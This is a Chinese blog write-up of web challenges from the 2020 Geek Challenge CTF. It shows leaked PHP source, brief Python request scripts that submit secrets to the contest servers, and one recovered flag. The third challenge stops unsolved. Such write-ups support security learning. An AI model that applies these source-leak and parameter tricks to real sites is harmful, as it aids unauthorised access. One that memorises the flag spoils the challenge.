avatar
文章
172
标签
51
分类
29
首页
归档
标签
分类
友链
关于
额外功能
咲夜南梦's 博客
首页
归档
标签
分类
友链
关于
额外功能
CTF-2020年极客大挑战
|CTF
阅读量:|评论数:

Web

EZwww

根据hint,发现源码泄露

1
http://47.100.46.169:3901/www.zip

解压之后代码如下

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
<html>
 <head>
  <title>Lola's website1.0</title>
 </head>
 <body>
 <?php echo '<h1>welcome to my website</h1>'; ?>
 <?php echo '<p>i will never forget to backup my website......</p>'; ?>
 <?php echo '<img src="img/lola.gif" alt="welcome~"/>'; ?>
 </body>
</html>
<?php
$key1 = $_POST['a'];
$key2 = base64_decode('c3ljbDB2ZXI=');
if($key1 === $key2)
{
    //this is a true flag
echo '<p>SYC{xxxxxxxxxxxxxxxxxx}</p>';
}
?>

发现只要以POST的形式a=base64_decode('c3ljbDB2ZXI=')成立,即可输出flag

Exploit如下

1
2
3
4
5
6
7
8
9
10
11
import requests
import base64
secret = 'c3ljbDB2ZXI='
ip = '47.100.46.169:3901'
url = 'http://%s/index.php' % (ip)
data = {
	'a' : base64.b64decode(secret)
}
print("POST %s\t%s" % (url,str(data)))
response = requests.post(url,data=data)
print(response.text)

回显

1
2
3
4
5
6
7
8
<html>
 <head>
  <title>Lola's website1.0</title>
 </head>
 <body>
 <br><h1>This website has been backed up</h1><br> dont forget to post something important to get what you want ~QAQ~ <br><br><img src="img/lola.gif" alt="welcome~"/> </body>
</html>
<p>SYC{Backup_1s_4_good_h4bit_l0l}</p>

SYC{Backup_1s_4_good_h4bit_l0l}

刘壮的黑页

一打开页面,全黑的,👴傻了

立即修改背景,给它洗白白

!(2.png)[2.png]

在底部发现php代码

1
2
3
4
5
6
7
8
<?php
include("flag.php");
highlight_file(__FILE__);
$username = $_GET['username'];
$passwd = $_POST['passwd'];
if ($username === 'admin' && $passwd === 'syclover') {
    echo $flag;
}

在post发包时带着GET的参数即可

Exploit如下

1
2
3
4
5
6
7
8
9
10
import requests
ip = '106.54.75.217:8080'
username = 'admin'
password = 'syclover'
url = "http://%s/?username=%s" % (ip,username)
data = {
	'passwd': password
}
response = requests.post(url,data=data)
print(response.text)

Welcome

通过测试发现GET请求被ban了

尝试通过POST请求,发现可以得到页面源码,如下

1
2
3
4
5
6
7
8
9
10
11
12
13
14
 <?php
error_reporting(0);
if ($_SERVER['REQUEST_METHOD'] !== 'POST') {
header("HTTP/1.1 405 Method Not Allowed");
exit();
} else {
    
    if (!isset($_POST['roam1']) || !isset($_POST['roam2'])){
        show_source(__FILE__);
    }
    else if ($_POST['roam1'] !== $_POST['roam2'] && sha1($_POST['roam1']) === sha1($_POST['roam2'])){
        phpinfo();  // collect information from phpinfo!
    }
}
文章作者: 咲夜南梦
文章链接: http://yoursite.com/2020/10/22/CTF-2020%E5%B9%B4%E6%9E%81%E5%AE%A2%E5%A4%A7%E6%8C%91%E6%88%98/
版权声明: 本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来自 咲夜南梦's 博客
CTF Re
打赏
  • 微信
    微信
  • 支付宝
    支付宝
相关推荐
2018-11-27
CTF-JarvisOJ-Basic-Easy Crackme
2018-12-08
CTF-JarvisOJ-Re-[DD-Hello]
2018-11-22
CTF-成都大学网络攻防-Re1
2018-11-22
CTF-成都大学网络攻防-Re2
2018-11-22
CTF-成都大学网络攻防-Re3
2020-04-30
ARM-常用汇编
评论